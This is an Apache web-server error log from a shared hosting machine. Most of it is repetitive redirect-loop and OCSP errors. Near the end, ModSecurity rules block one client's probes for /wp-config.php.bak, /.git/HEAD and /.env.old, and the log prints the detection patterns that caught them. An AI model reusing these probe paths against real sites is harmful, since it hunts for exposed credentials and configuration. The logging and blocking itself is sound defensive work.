[Mon May 11 19:08:45.648503 2026] [core:error] [pid 1502013:tid 1502066] [client 52.141.35.48:3132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:45.648549 2026] [core:error] [pid 1502013:tid 1502066] [client 52.141.35.48:3132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:46.395772 2026] [core:error] [pid 1501883:tid 1501906] [client 52.141.35.48:3090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:46.395821 2026] [core:error] [pid 1501883:tid 1501906] [client 52.141.35.48:3090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:47.120782 2026] [core:error] [pid 1501831:tid 1501854] [client 52.141.35.48:3576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:47.120831 2026] [core:error] [pid 1501831:tid 1501854] [client 52.141.35.48:3576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:47.895689 2026] [core:error] [pid 1424905:tid 1424915] [client 52.141.35.48:4066] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:47.895720 2026] [core:error] [pid 1424905:tid 1424915] [client 52.141.35.48:4066] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:48.646687 2026] [core:error] [pid 1501831:tid 1501835] [client 52.141.35.48:3122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:48.646726 2026] [core:error] [pid 1501831:tid 1501835] [client 52.141.35.48:3122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:49.353645 2026] [core:error] [pid 1501883:tid 1501891] [client 52.141.35.48:3572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:49.353683 2026] [core:error] [pid 1501883:tid 1501891] [client 52.141.35.48:3572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:50.054721 2026] [core:error] [pid 1502013:tid 1502040] [client 52.141.35.48:4060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:50.054757 2026] [core:error] [pid 1502013:tid 1502040] [client 52.141.35.48:4060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:50.759402 2026] [core:error] [pid 1424905:tid 1424923] [client 52.141.35.48:3539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:50.759433 2026] [core:error] [pid 1424905:tid 1424923] [client 52.141.35.48:3539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:51.475344 2026] [core:error] [pid 1424905:tid 1424924] [client 52.141.35.48:3073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:51.475366 2026] [core:error] [pid 1424905:tid 1424924] [client 52.141.35.48:3073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:52.200565 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:3552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:52.200598 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:3552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:52.905452 2026] [core:error] [pid 1501883:tid 1501899] [client 52.141.35.48:4034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:52.905488 2026] [core:error] [pid 1501883:tid 1501899] [client 52.141.35.48:4034] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:53.677922 2026] [core:error] [pid 1424905:tid 1424927] [client 52.141.35.48:4058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:53.677949 2026] [core:error] [pid 1424905:tid 1424927] [client 52.141.35.48:4058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:54.457254 2026] [core:error] [pid 1424905:tid 1424914] [client 52.141.35.48:3503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:54.457288 2026] [core:error] [pid 1424905:tid 1424914] [client 52.141.35.48:3503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:55.264544 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:13893] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:55.264570 2026] [core:error] [pid 1424905:tid 1424926] [client 52.141.35.48:13893] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:56.027051 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:3079] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:56.027084 2026] [core:error] [pid 1501883:tid 1501901] [client 52.141.35.48:3079] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:56.729965 2026] [core:error] [pid 1501883:tid 1501889] [client 52.141.35.48:3547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:56.730001 2026] [core:error] [pid 1501883:tid 1501889] [client 52.141.35.48:3547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:57.432017 2026] [core:error] [pid 1501883:tid 1501888] [client 52.141.35.48:3582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:57.432054 2026] [core:error] [pid 1501883:tid 1501888] [client 52.141.35.48:3582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:58.135800 2026] [core:error] [pid 1501883:tid 1501906] [client 52.141.35.48:3103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:58.135825 2026] [core:error] [pid 1501883:tid 1501906] [client 52.141.35.48:3103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:58.866480 2026] [core:error] [pid 1501883:tid 1501893] [client 52.141.35.48:3922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:58.866515 2026] [core:error] [pid 1501883:tid 1501893] [client 52.141.35.48:3922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:59.695946 2026] [core:error] [pid 1501883:tid 1501900] [client 52.141.35.48:13896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:08:59.695982 2026] [core:error] [pid 1501883:tid 1501900] [client 52.141.35.48:13896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:00.444218 2026] [core:error] [pid 1502013:tid 1502044] [client 52.141.35.48:3569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:00.444253 2026] [core:error] [pid 1502013:tid 1502044] [client 52.141.35.48:3569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:01.161612 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:13909] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:01.161643 2026] [core:error] [pid 1501831:tid 1501847] [client 52.141.35.48:13909] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:01.863381 2026] [core:error] [pid 1502013:tid 1502040] [client 52.141.35.48:3540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:01.863409 2026] [core:error] [pid 1502013:tid 1502040] [client 52.141.35.48:3540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:02.653726 2026] [core:error] [pid 1501883:tid 1501885] [client 52.141.35.48:3948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:02.653755 2026] [core:error] [pid 1501883:tid 1501885] [client 52.141.35.48:3948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:09:15.559861 2026] [security2:error] [pid 1502013:tid 1502032] [client 43.166.250.187:57682] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agINO5Yn-x0CHsbEbP2FmgAAAII"]
[Mon May 11 19:10:06.885543 2026] [security2:error] [pid 1501831:tid 1501844] [client 43.156.47.42:58124] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/2020/02/"] [unique_id "agINblNddpkriGUb6ZVQrAAAAQs"]
[Mon May 11 19:10:10.430531 2026] [authz_core:error] [pid 1424905:tid 1424923] [client 47.128.28.140:11388] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/html-api/error_log
[Mon May 11 19:10:24.341816 2026] [core:error] [pid 1502013:tid 1502031] [client 47.128.37.131:23788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:10:24.341949 2026] [core:error] [pid 1502013:tid 1502031] [client 47.128.37.131:23788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:10:34.520606 2026] [security2:error] [pid 1502013:tid 1502033] [client 43.135.148.92:35120] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agINipYn-x0CHsbEbP2GRQAAAIQ"]
[Mon May 11 19:10:34.522310 2026] [autoindex:error] [pid 1502013:tid 1502033] [client 43.135.148.92:35120] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:10:52.572354 2026] [authz_core:error] [pid 1501883:tid 1501890] [client 216.73.216.110:59193] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/survey/error_log
[Mon May 11 19:11:31.992130 2026] [authz_core:error] [pid 1511173:tid 1511181] [client 47.128.58.244:44250] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sitemaps/providers/error_log
[Mon May 11 19:11:32.214959 2026] [security2:error] [pid 1501883:tid 1501886] [client 43.157.22.109:59624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agINxDP5Q_-MBliRCAxCWgAAAAE"]
[Mon May 11 19:11:46.848186 2026] [ssl:error] [pid 1424905:tid 1424925] (EAI 2)Name or service not known: [client 45.148.10.249:10926] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.848457 2026] [ssl:error] [pid 1424905:tid 1424925] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.850330 2026] [ssl:error] [pid 1501831:tid 1501856] (EAI 2)Name or service not known: [client 45.148.10.249:10950] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.850369 2026] [ssl:error] [pid 1501831:tid 1501856] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.851124 2026] [ssl:error] [pid 1501883:tid 1501893] (EAI 2)Name or service not known: [client 45.148.10.249:10846] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.851224 2026] [ssl:error] [pid 1501883:tid 1501893] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.852036 2026] [ssl:error] [pid 1511173:tid 1511189] (EAI 2)Name or service not known: [client 45.148.10.249:10882] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.852075 2026] [ssl:error] [pid 1511173:tid 1511189] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.853936 2026] [ssl:error] [pid 1502013:tid 1502050] (EAI 2)Name or service not known: [client 45.148.10.249:10928] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.853966 2026] [ssl:error] [pid 1502013:tid 1502050] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.854094 2026] [ssl:error] [pid 1424905:tid 1424930] (EAI 2)Name or service not known: [client 45.148.10.249:10834] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.854110 2026] [ssl:error] [pid 1424905:tid 1424930] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.854305 2026] [ssl:error] [pid 1501831:tid 1501836] (EAI 2)Name or service not known: [client 45.148.10.249:10896] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.854326 2026] [ssl:error] [pid 1501831:tid 1501836] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.854481 2026] [ssl:error] [pid 1501883:tid 1501904] (EAI 2)Name or service not known: [client 45.148.10.249:10944] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.854497 2026] [ssl:error] [pid 1501883:tid 1501904] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.854627 2026] [ssl:error] [pid 1511173:tid 1511188] (EAI 2)Name or service not known: [client 45.148.10.249:10810] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.854640 2026] [ssl:error] [pid 1511173:tid 1511188] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.854784 2026] [ssl:error] [pid 1502013:tid 1502066] (EAI 2)Name or service not known: [client 45.148.10.249:10920] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.854801 2026] [ssl:error] [pid 1502013:tid 1502066] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.855298 2026] [ssl:error] [pid 1424905:tid 1424920] (EAI 2)Name or service not known: [client 45.148.10.249:10864] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.855316 2026] [ssl:error] [pid 1424905:tid 1424920] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.855590 2026] [ssl:error] [pid 1501831:tid 1501841] (EAI 2)Name or service not known: [client 45.148.10.249:10912] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.855607 2026] [ssl:error] [pid 1501831:tid 1501841] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.855875 2026] [ssl:error] [pid 1501883:tid 1501888] (EAI 2)Name or service not known: [client 45.148.10.249:10808] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.855890 2026] [ssl:error] [pid 1501883:tid 1501888] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.856012 2026] [ssl:error] [pid 1502013:tid 1502045] (EAI 2)Name or service not known: [client 45.148.10.249:10974] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.856031 2026] [ssl:error] [pid 1502013:tid 1502045] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.856191 2026] [ssl:error] [pid 1424905:tid 1424932] (EAI 2)Name or service not known: [client 45.148.10.249:10880] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.856214 2026] [ssl:error] [pid 1424905:tid 1424932] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.856352 2026] [ssl:error] [pid 1511173:tid 1511190] (EAI 2)Name or service not known: [client 45.148.10.249:10966] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.856366 2026] [ssl:error] [pid 1511173:tid 1511190] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.856497 2026] [ssl:error] [pid 1501831:tid 1501842] (EAI 2)Name or service not known: [client 45.148.10.249:10946] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.856511 2026] [ssl:error] [pid 1501831:tid 1501842] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.856643 2026] [ssl:error] [pid 1501883:tid 1501907] (EAI 2)Name or service not known: [client 45.148.10.249:10904] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.856660 2026] [ssl:error] [pid 1501883:tid 1501907] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.857082 2026] [ssl:error] [pid 1502013:tid 1502040] (EAI 2)Name or service not known: [client 45.148.10.249:10858] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.857096 2026] [ssl:error] [pid 1502013:tid 1502040] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.857230 2026] [ssl:error] [pid 1511173:tid 1511191] (EAI 2)Name or service not known: [client 45.148.10.249:10806] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:11:46.857248 2026] [ssl:error] [pid 1511173:tid 1511191] AH01941: stapling_renew_response: responder error
[Mon May 11 19:11:46.869422 2026] [security2:error] [pid 1424905:tid 1424925] [client 45.148.10.249:10926] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wp-config.php.bak"] [unique_id "agIN0oW8yzYoWG_eyCXPbQAAAVE"]
[Mon May 11 19:11:46.869620 2026] [security2:error] [pid 1424905:tid 1424925] [client 45.148.10.249:10926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wp-config.php.bak"] [unique_id "agIN0oW8yzYoWG_eyCXPbQAAAVE"]
[Mon May 11 19:11:46.870078 2026] [security2:error] [pid 1424905:tid 1424925] [client 45.148.10.249:10926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0oW8yzYoWG_eyCXPbQAAAVE"]
[Mon May 11 19:11:46.871148 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/HEAD"] [unique_id "agIN0lNddpkriGUb6ZVReQAAARc"]
[Mon May 11 19:11:46.871308 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/HEAD"] [unique_id "agIN0lNddpkriGUb6ZVReQAAARc"]
[Mon May 11 19:11:46.872442 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVReQAAARc"]
[Mon May 11 19:11:46.873711 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.old"] [unique_id "agIN0oW8yzYoWG_eyCXPbgAAAVY"]
